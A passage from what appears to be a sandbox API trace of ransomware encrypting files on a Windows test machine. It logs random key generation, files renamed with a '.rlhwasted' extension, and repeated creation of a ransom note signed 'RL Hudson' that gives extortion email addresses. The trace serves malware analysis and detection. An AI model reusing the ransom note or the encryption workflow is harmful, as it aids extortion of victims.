FOLLOWING KEY:\r\n[begin_key]AGv0AGLgt1+AcdI80Ld6FgT9I+R1dd2qX311KvkD152j5nLFZPmyEQ67nhiCeAsl\r\nSf+tqa1epOsr5stf6lgjjynXF2hkyJ8FtWpOd+hF5svbv3hU+xI0a5Nn0dhpAg6J\r\n7nD/CTozcfDR1kqaaNpdEMrGJPWq59iSRwU6GNcICqroer9DBY+rgbd/6VAHruo7\r\nr7JMSRjhNe3adCI3//Fuy90s+vgCRz3yhgd3p9p6ARsylhJD3BIHikLFTiSWc62C\r\nGtIEUDtIiwstMmwRnjqg0qm7x9cU+o1rhhI+ucdM3QQeM6+XABC1cAEKczCGzLt+\r\nYk/MiMoDzcUyOL+8JKDNzwRKn6RMp3dV/kuqvZmeuhSRYnnRxyzBSPv0o2cOmU7l\r\nw0QXoRZSZS1E5oDtARhjvuZKjXXo8wC/WfWvwUlsiu1HRYGWLuoztRaDuAigYqO8\r\n9yrX4yVTVygpUIngLWanRmCxBbH2/1Cm5HrUlyOIphdwtMaNvq1YdQkgh/O8cfcf\r\n0EjuqpLLITSgOWkvQffMF6RKFGxNuxMTolKbWo0hu5t0EwvT+PJaVBHjzMaOefVR\r\nDu9bRE2EhIkNW1JLAxVt1bxJOnjla6k9otRmlJQTwj3JmEBEn94J1ZbEzAKXYvnM\r\ncXL1DeO1noy+FUm9hz2kTM1PqnLDf/AKpGDOMKegg3K=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.440] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.440] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.440] SetEndOfFile (hFile=0x104) returned 1 [0198.443] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.443] CloseHandle (hObject=0x104) returned 1 [0198.445] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.445] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713220 | out: hHeap=0x6b0000) returned 1 [0198.446] _aulldvrm () returned 0x0 [0198.446] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0198.447] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.447] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.447] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\Glpj4z.flv") returned 82 [0198.447] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ae) returned 0x70d2b0 [0198.447] lstrcpyW (in: lpString1=0x70d354, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.447] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.447] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0198.448] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.448] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\Glpj4z.flv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\glpj4z.flv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.449] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.450] SetEndOfFile (hFile=0x104) returned 1 [0198.450] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.450] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.451] lstrcpyW (in: lpString1=0x70d354, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.451] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\Glpj4z.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\glpj4z.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\Glpj4z.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\glpj4z.flv.rlhwasted")) returned 1 [0198.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\Glpj4z.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\glpj4z.flv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.453] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0198.457] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xc8c6 [0198.457] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc8c6) returned 0x6a0000 [0198.457] CloseHandle (hObject=0x10c) returned 1 [0198.468] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.469] CloseHandle (hObject=0x124) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.469] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0198.477] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.477] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.478] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0198.482] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.482] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.545] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.545] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.545] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.545] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]meWcDCgPKnJRTo2sY3/Y0h4nIFnsdjTOi9u/l1qmEjDgQ1sQdStbD0jKQzoEkYjz\r\nX98ZOtnPgKi6Ul5N+LChesyu/3wraYSO0wj8lqg9XPv8GScGfZju13e9YjAQtn1/\r\nTRonPJzJRDb0IHn2sJPor1kOQUpwD+qtB5T0xaDrcVTVWaYsuFfm+ZBGc1nr4Srm\r\nmby91Nro/GW1u7DxrqBYBXRTuibsa7JEIWNCoe7XwV87nKCGPNK4ODIQ1Tq2HIny\r\nixucgkPoYfK3Q6vIchSHvBjU7oMjjwiFcvhR8q2bMzzk8M6KdSZ1v0i9IocM5IF0\r\nqKw5dsJ65GQ8o26Petqaapd5KXvh8aiLP57OhNDzd+GONY+leymTGqPSgwpBMR4b\r\nDWjpmtyYI4ktdq8pkEwZwst1nyNak4wIB34hJ1zo0vq+EUXJvCgOesSles1hmeHK\r\nB598bgYS8bw+K7QmqfvSceCH71rFM46RVOmgtE6jicNeRrftD1L3zB7Wbe+H+nIf\r\nZrZW1KNCQiqX79LishVgXcwTBaaW++tEZrO4JizeksZZ0vwhkz/QJd8KBXYYJljo\r\nObT1tnEmR0ljZOf5EeQhIInpN6tr0jkpfaoJZoTrrMM7kGtidJWE6+zMgnTvz7ET\r\njbc0ARi4eDHGnbhfpWLJX5ZGuum5RUiUkDfBgyhlrTt=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.545] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.545] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.545] SetEndOfFile (hFile=0x104) returned 1 [0198.548] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.548] CloseHandle (hObject=0x104) returned 1 [0198.550] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70d2b0 | out: hHeap=0x6b0000) returned 1 [0198.550] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x700f68 | out: hHeap=0x6b0000) returned 1 [0198.551] _aulldvrm () returned 0x0 [0198.551] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0198.552] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.552] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\Ublc3HNGSf.mp4") returned 76 [0198.552] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x712fd0 [0198.552] lstrcpyW (in: lpString1=0x713068, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.552] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.552] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0198.553] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.553] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\Ublc3HNGSf.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\ublc3hngsf.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.554] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.555] SetEndOfFile (hFile=0x104) returned 1 [0198.555] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.556] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.556] lstrcpyW (in: lpString1=0x713068, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\Ublc3HNGSf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\ublc3hngsf.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\Ublc3HNGSf.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\ublc3hngsf.mp4.rlhwasted")) returned 1 [0198.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\Ublc3HNGSf.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\ublc3hngsf.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.557] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0198.557] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x11cc5 [0198.557] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11cc5) returned 0xb00000 [0198.558] CloseHandle (hObject=0x10c) returned 1 [0198.562] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0198.563] CloseHandle (hObject=0x124) returned 1 [0198.563] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.563] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0198.564] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.564] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.564] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0198.565] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.565] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.573] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.573] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.573] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.573] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gUP3fx/uCX5wWMmvKKHKkB1ZJ6XGWJtLeSG5nh+j1mAVJr/WY2QvZKpc6LmSGsWs\r\nlRBEhkyh3IVsJUOTR5iEvuvwljfP9cl/3B96xfC1eUyqvFEjHAle/eSOzgveORX7\r\nRkkc03I0m4tpD+Srm47smDMpAqjuUtdDGZ94RBYZIkzS0mp9Edd+kArLwikMPxWC\r\ni3wi0m0iciM70e/cx1fbciYWSX0bMVQpVdKhpVvcevFUT47kCZN1MxA0XhCTtuIc\r\nPZ9X5tWelpRl3gYx7HvLPVjCMUq/NQiw+vm690+jpgk9skWkSwkKkL8tyDvs4cSZ\r\nM7dqYbACT0BafiwRbMcajoAM68mt8jwTxnfsRcNPW/h4Yrmhpi49mtecVUuSnjlT\r\njPTVARYrM1iVbWY1XosNLqmGiAQY4HL9Y2RcNvZdyf/47X53DhyT/VfTY3EBoOlA\r\nyvpZSuusCgoMKTKWRQOLgo5WHndyK8pWbQJ8b2tSQSyc5NXOT5wp5AYgs4AEn1pW\r\nC03RhDu4Ss48b1UsXqvBc/dE3d8raKORkeGEIis5ClyPQ3B8Gg/b9vDkC7IiCXha\r\nbzgR/QdhWJHSjRrIpSVDUbqem79pLE6KPLFna7G0VsNvS5s3aA1JLJaoBPih8dHw\r\niPekaY+/RIcOggsMDj8ZyDamHUoVrVieNnGwtXt7TxF=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.574] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.574] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.574] SetEndOfFile (hFile=0x104) returned 1 [0198.576] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.576] CloseHandle (hObject=0x104) returned 1 [0198.578] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0198.578] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fec00 | out: hHeap=0x6b0000) returned 1 [0198.578] _aulldvrm () returned 0x0 [0198.578] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0198.579] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.579] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.579] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\vTaRQvsjbndGDGxim5.swf") returned 84 [0198.579] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b2) returned 0x712fd0 [0198.579] lstrcpyW (in: lpString1=0x713078, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.579] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.579] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0198.580] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.580] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\vTaRQvsjbndGDGxim5.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\vtarqvsjbndgdgxim5.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.580] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.581] SetEndOfFile (hFile=0x104) returned 1 [0198.582] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.679] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.679] lstrcpyW (in: lpString1=0x713078, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.680] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\vTaRQvsjbndGDGxim5.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\vtarqvsjbndgdgxim5.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\vTaRQvsjbndGDGxim5.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\vtarqvsjbndgdgxim5.swf.rlhwasted")) returned 1 [0198.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\vTaRQvsjbndGDGxim5.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\vtarqvsjbndgdgxim5.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0198.694] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0198.694] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x18c00 [0198.694] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18c00) returned 0xb00000 [0198.694] CloseHandle (hObject=0x128) returned 1 [0198.703] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0198.705] CloseHandle (hObject=0x10c) returned 1 [0198.705] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6d4580 [0198.705] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0198.706] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6d45c8 | out: pbBuffer=0x6d45c8) returned 1 [0198.706] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.706] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0198.709] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.709] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.721] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.721] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0198.721] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.721] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 